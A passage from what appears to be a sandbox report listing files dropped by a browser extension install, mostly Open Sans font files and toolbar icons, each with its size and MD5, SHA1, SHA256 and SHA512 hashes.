SHA19682d47dc55e2f2722c939524855168ac2ff1d8b
SHA25641cbd2cce0e80cc929588af21c12ebcfb92d98ef90d681899c4a2d275818d7f4
SHA51203b7992b965977602a2a301e46d27fc6cf41fd2b8c95afc733212697f5ae155e15dcfdf3100274a7085b551e6ad465762e77e40f228038b0af4c42cf67f0dc04
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-600.svg
Filesize54KB
MD5e16f375be3c2a73b58255a02f6d3a9ce
SHA1acc429c1bb8c8748b9fa1d00722401c8d8a8c007
SHA2564a464102b4370f93e3f5d492dfdabc3a8d7f8052cb817d4fec0542cac04c30b8
SHA512fdfa163b25cc25042cb34159cc357e3337b32630643c39bdf1b37a13c486ea3c02293dbcd2be790b25438e6f116566adeeaf7b437e85ae4cf410e117100b767b
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-600.ttf
Filesize38KB
MD55613b984da07ee40456c6bc790ca2f21
SHA1acec6c48759b9a14a56371ae0027c1577f05dec9
SHA2568d0e99cf50d6d7ac44bbceaa8062697392b9f71532d8e9716ff9cd2bf5a78103
SHA5127f65f9f5574b2a8b1f35f3e5636f8d6e20f57137b878e143e092739dc585518cf2bc4f151a171e952d48d038b1fd0b44f703acd7f20e33c88e45e0a02efe9674
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-600.woff
Filesize23KB
MD5d90dc5001b28fd92491e2240ba90fd91
SHA1c50363443e57440d39d47e1c126e38785e24ff7c
SHA256d44d59ec2328d3dce4046b23380c9f9506db2e31a99cfa1caa207d41485a5cd5
SHA51263279222a2d6d7a58958ebb9932ccda537d1e0ca008915d3a1fd5dadd35e8102cfc5fd9343d9386ac71c0f5418bda2d022d52b8a909f60d410039fad4dcaf46c
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-600.woff2
Filesize19KB
MD50dd0a359a053b2b5bb856a9580da9780
SHA14f8481415cbf3e5900f926e0f1b2822ce991c36e
SHA256784a7423298c587ce89819cd81d6e225877b32605b4b40eb3ccafb3f3f3e5750
SHA512b7e09a097632e2c1a06eb08c7610b715bd2aba83e35468ced16256de4b96acb113f1946de74998ed1f246ce8e8e8f2a7a780b18aca2e0b56130c5c087e127c54
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-700.eot
Filesize20KB
MD5e5abc8bf8bd5635024706adffbed5846
SHA1cde58bdbef093f6a589a69188bbeffa23708291a
SHA256602e36025f912400eb552f0f522bb8a75e9e9db6a825695c89dcb49a5828aef9
SHA512fda634368a61e4c22a0d8cda09e0c94feccf1579a9c3d20d2faa8567422c4a44ef9ae139a5efdb05619adfc78d2f6f4e5ebcfed40e7a0beb9ce0117eaf183a9e
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-700.svg
Filesize54KB
MD52e00b2635b51ba336b4b67a5d0bc03c7
SHA18338e3159cc9c5ff55cac72674afb7e90118ff19
SHA2567e40ecf3b9b2ded5a267a3fe330eda6d71c10a1fc716d12237812322057411cb
SHA51260979ca59776caddff6cad8d391d8191aa37f838f50c2c1343749060e88aaf40db8216e30e6bf00ac164be967a12c0221d72b6b60416cf455a15b5501ec4d969
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-700.ttf
Filesize39KB
MD581ca5af45045261f536c71baafd77298
SHA14f613dced987f67dd32883fa0cd9298a20c102f2
SHA256d123a1a00d692830f1f5276c64edfbc7abc9d0640bbb02596f83e10b14f89c0d
SHA5122156c44e95f51c8a56ca2aca1d5b6127a9e76ce709506ddda2df37cac554fd04303f14a11232a18ac6098c8502ed515d2ccbd1f8671a180490acf8a573457284
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-700.woff
Filesize23KB
MD5efe9ead0aecdedc597ec9d4e745e0a58
SHA1df6a1ea1917ea01c1f53f73cd9412afcfd254875
SHA256c173db3aba8f65231290d9c956253e0f8bbfb12750e1c4c56b26cf64fdefa735
SHA512ec781dce0b93d82d4096f8fcf1b3397b686d2415abadf543dd00ddb55a5aa49a87d063ed4fde670eca3ffb0c97c72df506265daf73c4b03f4d6d9a98996e9109
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-700.woff2
Filesize19KB
MD515df1fb3e82321d94a0ca758c62e25d2
SHA19fce105a87ee8b8bef404942cf48c42ba5ea1ac2
SHA256b41570405890d4f995da7b265ceb5cfb50246a940f9489525a8f526cfd160356
SHA5126e18ebebd7d7101cd04394595e4243abaebac2894ec303978b8fcb892a2922539c945ee5c549470ce79e44dddb25ccedc03fff272fcda17883c29b504e5de2d0
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-regular.eot
Filesize20KB
MD5916fcc0b03b40457b311609ac7226183
SHA1193e96a3b8ed9720bdd05d56f81dfd9dea43b5c2
SHA2566ffc257b02167f060ce8c84cf4137f896b812a814ecbdbf9e85bf3af99428dcd
SHA512974b5ade776b0915c3cca3dc4f0b5dd6b635f0053f10658fe63145e16de623023ede0ba3571caffb1aa6e4adcb9d3b3ee3dfd3d58d00028311621372bcb78b48
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-regular.svg
Filesize54KB
MD57aab4c13671282c90669eb6a10357e41
SHA14ca4e88a77a4d81138206a10793507cde43e31a8
SHA256f8396d832e2b270319c4e17df620c06f77293f5c4e7ffdce337c9b90fa75d133
SHA51208a74874f74c1b75f7a93e94faa632d1bf21c2d42c85fb66c9b11138e60aeafea8874b7bf33facf7503d19dc7965142d78e5015a0dbc340da2b4550d232d7116
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-regular.ttf
Filesize37KB
MD5abd464fd52dec0108904f062f30b31d4
SHA1f51881b3732bcb7aac9592f50184720e7d726ccf
SHA2560c4595868d57ebb5f2793e22e8493bfe2606cd8c628a039d2d1a4fa79f642b05
SHA5127ed6d565101bdd3e15596c7cc9ba8cb4c4a7be57333fec06bb01492360b409194f0ae6a8db1c368a1b1880ae260c122d1f0f551b74a6ea18e932d07687ccaea5
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-regular.woff
Filesize23KB
MD52b6f63fce9104d1223d83dd12cd6038e
SHA11ac49ab02668c5deb14a497faefcb7bfa6c15731
SHA25632ad89cba217fa7f180d331f6e43d87a75e8eb1b97ed102d178c534fd6e51038
SHA5121ad5b9865a50dce57ff6571352ecb4467ab7c6821fb343f4afbfc85c7cf35a4c84a8ea4357fa7878919947ad913aa2d8b8318277373fabf2297e78ef20117aca
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_141554016\CRX_INSTALL\fonts\open-sans\open-sans-v15-latin_latin-ext-regular.woff2
Filesize18KB
MD581d0487ba73afd292730e6f89e83c2ea
SHA120f0b5b7cac1d9a707d3cce56b7a4c16a5a11d46
SHA256557116ee5706daa3b6cb2f52e7490e22db9c30ebfc447a5c85458a5fa0f6f84b
SHA512f069c794442a237d55a31a4f17fbfbf5d8c4d82c12508ad45371641dfa177f03b7ef59360d2e91237d5d3c38cd11b0f3a145317b58af8d0cfc0e19c65eb313c7
-
Filesize
1KB
MD57d6f6b27842ae1bcbfa45f04669ed7e5
SHA1b58d4e18d1de9e869a457520353e73384376b2c1
SHA256cb5031b92d05a40fbbeba5c22fcbee49542826602a8ebc5aa2de6084755bfd6f
SHA51269734737316105daa385a22944e31542f424e2f217d2f94ff8f6469c12f34577f7def6ac0c74fc4b0e13079791731afba23d273df95e5e0fbf7fb326f99c0163
-
Filesize
168KB
MD5f8a8d9dbf5fe7367770fa891e647e7aa
SHA1e7b208ceef2d60a34a24b5e680b740eeac0c272d
SHA256029d7a6b0044eee1b1f7a936e159dfecba10b318de7e05ecc3f6795525dbcbe4
SHA5128e62b23c1de1ebc0d34f59ed795021b4b4116fc7c49bf1da365ad4895616ba8403403d45bd2c14ce58f967b5e266e550971a0157833884a58a913774b82942bf
-
Filesize
57KB
MD597adfec6bd687e9709445afc0c573c39
SHA11186a12a096465da449f1b0df7270dbc5283f4b6
SHA256c103fc2d0a2484f40fa091e188ead5757b737bd86d2a926488062436df8cdf50
SHA512e242f0673a8cd0f565a4dc79937bf8280421e2d90a0d7ac6cc18ffbc0b54a692edb714d9edf49d096c88cddc6465df086c98203d1abf960ac66e1186730bd009
-
Filesize
17KB
MD57580759316acf0e6d7a16da84559e6ab
SHA1f17ead86d623eb3527243ea6c6f5512a66fe7186
SHA256f11caa7844dac279cb19b87a7704e4982804a131b5893ec436aa092df587b2c0
SHA512181c4f78dd497539f010eb75e529f9fb48539d559eed5376860e4292cce86ac69b698d7791d64262cfc43454a98552a8a9bcfbf0c777e7e92f7cc67d035e59c6
-
Filesize
1KB
MD5f2c4252c26cf1eeb8fb17d077fa1de5c
SHA1a5b4ebea068b4e5afce5640be066906611fd3248
SHA2566e1ea4ad05b129daa8fb1f303edcd635e8eb6586266c0b2c6d0fa17139e8a55e
SHA512faee86ad9df82dc970095d17070506c285b48799c02b31897a625c98999c872b72639710898788a0e24c3e226a1b31c6ec0b2cf5efa93899730980ef81e61e0e
-
Filesize
478B
MD5268dbab3d2bef14c65aceb15ec0037e3
SHA1c40f859765f4e32e07b29c5cf675b571a49388fb
SHA256c10a217d93d9db7f3e50328b3f8a9314d8fd0376da88c00f5d5b9f2924326820
SHA512010ee0ccc0518d0f00d8f14a03080b4507eff1c80e15acac5407ed86d09d82ad9691ae4354dbb23988e6ef8226709ccf083a02d67b0142b97d9d5b997cbffc75
-
Filesize
398B
MD5e3709558c6998c808e07553bdd7e60b0
SHA1ead5e2d02fdbb83b75f9a40c445184847d07c027
SHA2565b5d11aab7f8844b6bab4497f82caf4a736f565301c4866c9f9b3f259a604437
SHA512bc5df31470e49854d556fe8712d0393dcacd8c790804a6ffc0a41e95ab55bf5d964e3bad4156c37f06f4a2d68a3660be1a5683bc11b3b7fffe77a9735859dbb8
-
Filesize
10KB
MD59699d91659fb6f3bb8cd28e49c3cd437
SHA13250e58f0359c1b08ceff548a6fd0c4974e97774
SHA256d75e19a17f0a1bc3e2e04d95ce9c642dfbabb53a96d97e93370de5796e3adb5c
SHA512a343ba71e2813f59a21fe776b84d39f9fc58446fdf51cd697a6529397fd0661a8f69a399d2a8d351656af2276d338311b04fe4ded2fe48a7a504afbf6b0b4b2a
-
Filesize
6KB
MD59764406c182b5e377dc9e8023968e82e
SHA153999b0d5620d8e80f357edf7230560feec1d40b
SHA256d8254fc7b70c9f3f5e16176f6bfba0fabf44e10de59b4a32ad53a5fcabf15b2c
SHA5125b6595aec0cf73c52bb74f5b97ed92cb21fa68649911027328dfd89a0445d03bf26322fc98e410f9eaa748c01128058dfa55ae912ea5b6db6a73a433327efc8b
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\_metadata\verified_contents.json
Filesize22KB
MD58812b25c089f19967e2fb3bf69f61bbd
SHA1f71bc3691f99e3c89831c5902f3bc14f67b85127
SHA256a4211fa0704d1a9bf664d7cf309d8aadd2374f212fda1b21fb09118aa0eb2afc
SHA51267f509e96fbc6eeb17c452603ec69838f988905522816458e1848d604b118b755fe427001a222244fa108b22717c506d29e69ca804451f7f8c0c237e83b7e6ee
-
Filesize
211B
MD5e77b5973274a700db856a649c24baccf
SHA1f113d9988778bef55e2b78e247a30423dd6e2451
SHA2567f8c53c687138a9807b7911890cc186d45664f59b4c8f644561f4ddc59d7393c
SHA5124aad265ff8e37d026bb75568503ec780e907d295a910ef8cfb8ed6ab8f51c47b3e044bc3576b1d5055551d55eb03d38cbc521613d8c33bfb3e11b0f617fe64f0
-
Filesize
6KB
MD55551e2ef3be5fd9adf599447389e5880
SHA172a4cfdb919c8022df14dc44f222b56d417aa6a9
SHA256d3507d42e1fb12c4513f762d1599191bab5304446de5dffd2f8a802ff034721e
SHA512f71f7642245f94769c2100b9540cd5be4f7dc80e7f208071fa71405d5fe501fcc6c5c4afc9de39e66c52758e2e19c795412353dc07412941a2f8d3813f91fd19
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\extensions_page\icon_64.png
Filesize1KB
MD54d7ea649781fd8c612cfbd0da491c4ef
SHA1e687980a5e51bdbae20874300f374cfe0743d130
SHA256197089f1ce0680a0d29c728d045636b532dd211aefdf3a6911e472fe43278ab4
SHA5122ae5fa477bc9fb4e24416d26d2303ef447544b4a24b0366a0324365ee6ec70da55750e373145f67f96e8b516843c73edfdc7741123663f8485fb3659b908eb37
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_128.png
Filesize2KB
MD58eedb5b767113927bfb788d7bb7b0cb7
SHA1cb1bcb19a09146c1ac62168386338584314431bc
SHA256a50dbdc3779bab3852929d6c8c63bef7f575efbee81bdf35e7e76d67ecdd038c
SHA5120f69f4d837fbaa6d7b413a5f933aaea00d10af0d3c332d239168ad7a7b7900ffc86532ac41f64f33b468d6a78d2101d8deac39475217b15d2f9b892e203140aa
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_128_off.png
Filesize2KB
MD5ef8b6289a2b60b3a0b95a889164c02a7
SHA10d86100c366cc55043075754e0a0eeb0c8b067b5
SHA256cc7a3f40ee3c8ba98cf7ad8375ec7f9d5f951f0a3b3d7cada232e793d3cd3bb4
SHA5123b298feec1c8de2e0764e0e30c6a73208ab8a73152a9192ae243435ccace6da19a4bfe64d39cf3cc88c6b8842d501584c3e545799c38d52d37e598a8675a3440
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_128_paused.png
Filesize2KB
MD5c5c9ccd58afc323933c5619c214eff0a
SHA1e3751d75a1213205c2740a215f7469a9f8283cc5
SHA256288f308bc2cf450dc633c791fc6b781e552a742ff50331f8d88b82a61fa7b98c
SHA512c60f717769a7060d1160dfddaceaed5bfa920cea7a15b8d9390337560990f057f006b95063357e3c888ffca03cfd7f61e7f2f761f7a9338b1d28107bae154e40
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_16_off.png
Filesize460B
MD50769189f4194e12f0314b2a97e9ec5c2
SHA1dd33374f0ec1acbda8be2e9a8d332f8b67b6e025
SHA256ae1acf4e701116e89527eb4c1fd98ff0860589d00ef0092cdcc936465d73ffcc
SHA512e698eef62aac58e871b6d5121f33153e60556accbe7fa632a7a412f37c391dfed9a5f64f87ad972641f31f0f084db70ce91b69afdffd12da62deb3646795d3e3
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_16_paused.png
Filesize483B
MD570949c9021e36b807038c5491ebbf11b
SHA196be78e1e5840c4ae70d0d4b76ab6b1dffd35d50
SHA25616e9e74afebd421776f1a58d2be4e6166e4e8299057c56b36db8203c717e1627
SHA512a1c4f84ba2ffdeef022669f28d1c8866da1975908a13e33daa197b841b37cdb814dff47cc476580f5932d20c119b3f294b6378114761c3d20cbc3290a9228811
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_32_off.png
Filesize738B
MD5e45f74df67a69284ae8ed875b3a88a06
SHA16cdbc91535778357e7f8d0d53327b5b8195fed09
SHA256422649440bce77f0368e93e3fbe3972be623b88b01486563b749ccec5701a57a
SHA51231d24ca7c86e72a4c99de9bd834b4c9ead8840af8b733b77b752d6b0ef907ba4ca856fc8b3112b0776428f511b9798d81c27a69b30670cf5b8e4c62cd38eae71
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_32_paused.png
Filesize750B
MD5e0b20d45ceda4ed438268179f813f8cc
SHA15f77946d6bab01fbbca78a43004c897d08db921a
SHA25643a9ca0268ddb8d69110fd6032f2dffb9c519be194539123c69122e29ee06e37
SHA5128d44281d770061b63b94f2c96d91b136819e407c03c3bc5887f1032de4c8c7800f14a2e2e50774cf75fcf67ed8b0ea4938f41be81e020cab342143c8ed53f1ab
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_48.png
Filesize1KB
MD552c2c5fe2a39376ba6f34591aaf8e121
SHA17e3a5a5a92137db8bf573f72a6143f53059c4d08
SHA25652c15a4202dd3971c82c75705c2a2303bd496dc09acb0fb508cd6960c1735f27
SHA51298c673a034725a39b965cbe7aab0b6897cad951acd072652d109f30f51812c054c0571ec8140877695987e2999b70a9d08cf9b995791054bb7cbabc0e38b7db8
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_48_off.png
Filesize1KB
MD5a87ab64560c34fc04e84cc8620332a73
SHA1c84db6a0c7463ccbc9d5661616f1d13fe0d230d4
SHA256895646aa8332c9dfc43735f45777599ad52652ae5c18ca710092e663e84559fc
SHA512053422efa8c1653b6d70fe92742db3e0f71a064eafe543375e64599308d7a52f856ed6aaeb8a123a569da98a707b15eb33b8a5ffe832393f9f95de4def78adb7
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_48_paused.png
Filesize1KB
MD56adc67c3920868a34fbaf3eedfe25813
SHA1ce7e43afc687d702ad19ed8770060f6e40b74b1d
SHA25660e7397fa6b6c46c6330f1ebe026672d6cdd0728f6d66beeb752fca1881a2b9c
SHA512b649d290a244a9731dfd4e6d79f4ee19a65481dff79811e02f22bdca6bf54aa9049f6a7fb7d462a536347c6cf2ac8f0f56202d4704780f253008d48633e9089f
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\common\toolbar\icon_64.png
Filesize1KB
MD52eb7d5e08d58659942f644af998216cc
SHA13169cd50796534273950a8e2df5e9bfc1a31bcce
SHA2568d608e382c5af36a63a9c63b8ec12efb5edf62b7db39621cc6359ded37378124
SHA512f30d59f1ecec09534bae48c2bd3f13d577ebd400b937e31fecaa7ef0525db17bd6d208548e7f32ac894090347fed40af2b5914cae6acb5b9bc472b029a100277
-
Filesize
296B
MD546bfe3643445521bd70bd3fffb2eabb3
SHA1daee9131eb5f3cf2edc342e44acdd0408ef8c4d9
SHA25630221ecece051585c12b13451a455924ccbadab5c4e22ded408b622e0112e17d
SHA512c0f13ed6631e30db9e01390512a55f7c70b0cb46507e57e957543d9f6eb59f6fde8610d6eb8e74f76afcf0ab40bf26cb23ac45178df9624f0b7fb676e02b1e0f
-
Filesize
3KB
MD5559c879498dab97a040fe98e381d9f58
SHA1f51fe8d3ab3ead95e5d97d008815227fd8710ca3
SHA2560204320dd5dfb0a87ff3c810ffce576d14aa888a6dcf145d2862baa10c6d8482
SHA5121e9ff99dc988b196208213de582aab9632868c9c193c4cc44d50f8394986e61a5a0987fa374dc1e4ca8b09aa6f61b3f33926ead453dc69e96706b8f76a20770f
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\dark\balanced_mode_active.png
Filesize1KB
MD5a56a44a13db644a86019a57e87bdd989
SHA115425f919f65b69207e0d609901d0291ef07e9b8
SHA256f08095cf0839cbef9e4789ee08fa5beb5b649db3e75cbc7658bfd4f17ff020e5
SHA5123a5bf4c57c4cdecc1272548dede30964a5e1a9b015f066c0b4aabd2e7ec5e72708a0ac49317bcb367fd8f935ecc4dfa02ab521174aedbbe8bf5ef518a54b96d8
-
Filesize
3KB
MD5d31bbbcfc4d455dcd2079b1880c56ba2
SHA1105fd3db64ff54a41d5ae54414ed37121c449536
SHA256005148984e6912540bbd4e9f1aec52f0b574b540e6a5dff42d32b7d2d73accb6
SHA512aa8a7c9f2749a09abbd331f586d6f3b5334d45df3d4c40811e550afd023d47ce36ff1dd6cf13b9cd0f6b0c8cdb0175895ae3fbc247ceae08bcf37635a9cae234
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\dark\essential_mode_active.png
Filesize1KB
MD572dda861c776ce110260496860b0eb7b
SHA137a79b9ad9756c621f39ccef8bc8dbe966c2697d
SHA25659b99d82d9e8eb5c3287b48ca5a202aed31cffce4675601242b4ed3f0cd56662
SHA512b35d251b7caaa027063d93923f165cc65aa3db3df5e7915bd4023f4c4c32dbec97b97264c4f047796e1f7abb9f4d5e05426cc039e613cf348914e362f0ede0e9
-
Filesize
397B
MD5fd153d4aa72eb1bc458d87e52100871c
SHA1355ed469a7cabe15f9e30260ef794073ce7bf3d7
SHA256e6b759174c91b25629126404b221c4b4105927eca1b40d136b738a1738872d83
SHA5120f4b573b006f0ef14bc6aa0dd3a2322cbc54bc8ba29f7edbc9bcdf01378facd69f23bc88c4e2d627616566ef9344ea299cfe402342bef0d76e9de632e7000433
-
Filesize
758B
MD5164da2e0b0a38eb1d63d6e52b44cd89a
SHA12677d3b8caa89f3784bcaa4f9b8c78abbff79be4
SHA256592c5476720fb27f6f725a1475a89e74a118454a3ac26127099dab2d650fc50e
SHA512606427b79770341972f4bc905125bc6b31351d0a45ae7eb76fd2cb512a94368f0dd488ea609700ff955418110eb29b9f24a559340a9e7cd47c216371cd060b76
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\dark\header_background.png
Filesize84KB
MD576d521090f4bd63fd00b0e9aca566772
SHA1ce2131bdc369bc12fa7e2f5b5591f8cd9a06fcb8
SHA2566c46d890e518e328f0d06578bfed8cc8b9e3b3f25e7500ca7e9afcf5ed1fd18d
SHA512df4b8b24f87c70110322b266f9e79cf69a347b4de417ee9cb92ed1565f3c6356ec544d3d0c65f0490bd275493429ae2a3cc0d77aacc21fd4ae044d36b2b3d708
-
Filesize
4KB
MD5e8e3eefe5f490e48d845774bbbb4db25
SHA198228597f4414364db6aea5c8c9185f3b3476166
SHA256c779095c66a0925bef8ceb674d96936c96fc408c09c041fd85ff0ba743791d2f
SHA512748f5340aba5987459f0c26ca1a424c50c2b2b9aab98ac23f6fa32ce6e127d03ae4b409da9fcd32c87b0e008aa8f5e09146f87c80117816323d47f9e9cb02575
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\dark\header_logo_off.png
Filesize4KB
MD559ab2e67d5ffddf0b5cf2539dd01a1dc
SHA17dbd314e447a948663d2a8eb57d726c05a341885
SHA256e67e47b7bc2d042441fd059422cccaf4d415cebbae1c2b2fb59beba16c5a9188
SHA512bc7a69f18ac7ed83b5b1ac3829a4e717075a61d1efda95dfa051903aa4787f3b1eb756a34815c94cf97f9810d0ca5388839567dc5e9a0bb0e32ceb170e7c6b80
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\dark\header_logo_paused.png
Filesize3KB
MD55d54e3d632e9c35682ac590bd8c707a8
SHA164249f9bbe480fe2516172702a95ace7e38ca408
SHA256dcd8e976ca3178af9ff1b84fac46461e228f2ede94c29f74ddc27ed49fc23df1
SHA512211df572d97e8778e3516e335169183a345949302bc44370464cc3d2426d8b3cf433d199b51eedc2c392f84023cf4475a4cbc102668560a97e5ba58029e78b82
-
Filesize
906B
MD584700e82113b2b4a772cad6f736a2bbc
SHA1da6fb8f5315189a259487db42dd4cb03e1c89c1e
SHA25680135ca992a06617e34cbc80aef922f49b77530c80d41168f96d8564b9de09db
SHA512721499aabbbcbb948191e23c5f1e572d49488320c878c8d9d43c2601211f831b9f560fb95094ccb2f6d5e254f427f6595efe94f08aec505fd07ac426e009a23b
-
Filesize
581B
MD5b9bf4c0f29f04acc59d554bf2eb80270
SHA19c304b9222f9ab522afe47b7ab4e906aacde9e67
SHA2563ff71bf736635b31252e339c1277b31f9bad69494624c37ee0430d229afdb9b1
SHA512d13afaf9b639f472139c49cfbdbccdddba5c70dfde4da6272d5517d25618d85d2d35adb783ce44dad8dc24ccee46c48b331303f9b0fcadeee594796f48005459
-
Filesize
4KB
MD55037ea3f310b3a642a9fd22e91aaa5e5
SHA1ee9fdeb294a6d7263a7527a72f3e5dfc82e387ec
SHA2565dd7fb4507a3bdea02b3f667d7900ef90bbfbc91d3b672e051b7a6893f7ae17f
SHA512519a5ce2501cba5a3a0e4fd169eb6258cbddfeb8c25f286d44dcd147139e5b3589dcba6067ff61645948d4584d442a4fb1f57d1ffd352f7e4916550f2297eb41
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\dark\options_logo_off.png
Filesize4KB
MD5f84963dda43a2e82bf6c0a185a6dbb24
SHA1e0131fe336af15088bf0420320fb93d7bb3d3b9f
SHA2565b28a72ecccc38bae85652dd086821ccab4e68ea0132ac13f12bd59d510e5b29
SHA512877240e878f80fc08084a7303f98eec09221e7f5f50f5fdc58cd2c82b3de092c4fe58113d56af3d05d4b75140d1bf4582efb7961c4132cbf4d8b2946db21994a
-
Filesize
680B
MD5e7bfeac6c7d0cdc6a2dfede2d36bdf78
SHA1cb0f45cffd8ba660cbf90e93efdcc9dc8c8df794
SHA2563b20d6ab5ff4b5aee32143cd0bebbac92c2ca0e34e94b393b3b669597ef63080
SHA512ae70258dc93787e20f0c9427e4b9503e5c6c2b455927d86e5866171c343c96b89de41a9ca978dd25a994c31dd943b57518ff58a15815818cb0e8fcd02c5610ec
-
Filesize
1KB
MD5fca6d30fc40a5426b7cc37a19d3a54a8
SHA13e2f0bce845182a638dca1ca7d1908e035e6f05a
SHA25641b595eb8052d879c6c521aab7fd2d41a8bf9b1f3d15916ac71177648463974d
SHA512e124bfb53b7b107dc5f17e4e15b8f33f17eb553fee61fc562eff2ead5647db6afa197a27fa0895bae701d5377ce58bf6db78ad49988191be9ab42800fa8940af
-
Filesize
304B
MD5e8ae1ce99f62e695b6120bd950cc0b78
SHA19c0d7556f8f7b14b2eeffc4d548ed8ba0987dbc1
SHA25696900b0c4ecd08f39b2d4a9931a607791de7f2a1e4f3c0574e34d68ed1999225
SHA51236c392b1d8e731b6ac652d626a38c0a5d5e2c27ab988cd1f0b1c343033d4fdf8fffafcde1f2df00ab5b1e3907ae472dcb8d4869ae93484243d84c462e21a5a3b
-
Filesize
3KB
MD558fa2e1e38e35cde4f8e0b3896ba9826
SHA104d450bd1cfc98d5da1607ef8031c9a3ce9b7173
SHA2565168ed31b97fef54157104479b5ad47f9c067c00df13ac59c15cc8e17b304734
SHA51235c8fb39ce0c76d60de9773b304ed68c7d27871b1924f45aeed60f8f728d7715883dc072b1e20c358c781d5178c38734dfb9ce46c38c121aeb47ff5f9c01fb34
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\dark\strict_mode_active.png
Filesize1KB
MD5239c8c0bd22c04b2d7dad129de68965d
SHA18f76a5e826a09aa6d793ee4903f49292adcb0504
SHA256a69a0873260ab007f94c3ef7f4d9dcac6dc97912db83906c3aacd6ec5817d904
SHA512a21eda73afe86da2cbb40fc875171632ea22a7361a194bfcf07f88685005bc5d4771422a5926ba5da2ab9600f79e879008a2ebb171aa6a36fef6b7b4209f8aba
-
Filesize
1KB
MD52d6fa11d7ce9c7cdb0dd4880fee807f7
SHA1167bb158e4410403ca304d89dc7bb6866ab6a1e9
SHA2563919c88a9f7e5b15acd692f47d7c81113f501b4d46a7d78d412cea7dede8ad6e
SHA5123dc8c4cee4ed8102afc3085a89f61e8c58fb54d79f33e7b442a7b4d0a2fe0060736da858f8dbeef2099192d254a3f4ee63da21ec418584dcccd3e67cb35e5878
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\dark\whitelist_action.png
Filesize258B
MD5a0d2121449df13ac82551e23b053c033
SHA121a0ce940970044470074bbcab8d5b34e2698c2a
SHA256d8cca0b6ddd4eb1c1172bfe26c9d46e74337ee0aea87f4378d725338a662e633
SHA51290add1e518b7c2bd93d66e8df1faa381d94ccf2fbce4a8ceed109914dd9c9e70ce41ea3eee0ce5b535bf3b1150a5926d8a68536c8ba8adaaf28c9be715264099
-
Filesize
384B
MD5b499d222f55b7c81feb861a9428e079e
SHA1ba0f1bf04886200af659e6f1a70e195c11615ada
SHA2562801de75b870a2f278d98ddd818600846b94a4456527e22e19d71518261c94f9
SHA51280516bef42df9949dea8333f7c43fcf03e9a4071bb9390b35df2c64148db4e9526c61626c44f672cb7ed57fac2eded5e83d8c0f3c81b76ea0f913b271584ed25
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir13056_464718784\CRX_INSTALL\img\normal\balanced_mode.png
Filesize3KB
MD557a25cb063d1a2b4b132b0ef5e3defac
SHA1e096ec70551459bba37d10f21995ca771a1f832e
SHA256a6d6b5c6e693cde868905857a09e855ad2ced432d2512a0044dbc241771a7f7c
